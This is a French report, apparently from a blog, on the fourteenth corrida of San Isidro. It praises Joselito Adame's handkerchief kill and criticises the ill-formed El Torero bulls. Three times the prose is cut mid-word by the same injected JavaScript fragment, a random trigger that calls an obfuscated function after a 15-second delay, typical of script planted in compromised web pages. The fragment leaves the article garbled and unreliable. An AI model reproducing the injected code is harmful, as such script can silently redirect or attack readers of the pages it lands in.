JOSELITO ADAME, UN HÉROS MEXICAIN

San Isidro, 14ème corrida. Ce fut un exploit mexicain récurrent. Il reprit le défi entre El Soldado et Lorenzo Garza à Madrid, en l’année 1935, quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andil fit la mise à mort avec un mouchoir à la place de la muleta et l’autre lui répondit en la réalisant uniquement avec l’épée. Ce que fit Adame eut encore plus d’importance car l’opposant était un toro très armé et non un novillo. En plus, il fut attrapé au moment après avoir plongé toute l’estocade et peu après le toro tomba, foudroyé sur le torero qui était tombé sur l’arène. Auparavant il l’avait toréé très bien, surtout de la main gauche, mais d’abord il lui avait appris, avec une élégante maestria, à charger des deux côtés. Impressionnant. Il coupa une oreille importante.
C’est avec ce dernier toro que commença et s’acheva la corrida du fer de El Torero. Le reste, aussi moche morphologiquement, avec davantage de kilos que de trapio et aux armures excessives, ouvertes, énormes, imprésentables pour une corrida de feria, ne permit aux toreros de rien faire. Le torero d’alternative Francisco José Espada fut également attrapé lors de la mise à mort en tuant son premier et ne put continuer en piste, il nous parut compétent et courageux devant un toro peu reluisant. Le lot de Ginés Marín fut accueilli avec une grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande ovation, mais il ne permit pas de faire une passe, le premier car il était invalide et le second car il ne voyait pas bien. Dommage. Pourquoi l’éleveur a-t-il choisi une corrida aussi moche, parce que les « veedores » des organisateurs l’ont ainsi voulu, parce que les vétérinaires l’ont approuvée ? Depuis quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anddes toros aussi ouverts de cornes, aussi disproportionnés et aussi moches chargent dans un élevage si braves et avec tant de toros bien faits comme est celui de El Torero ? Du métier, trésor oublié.

Les commentaires sont fermés.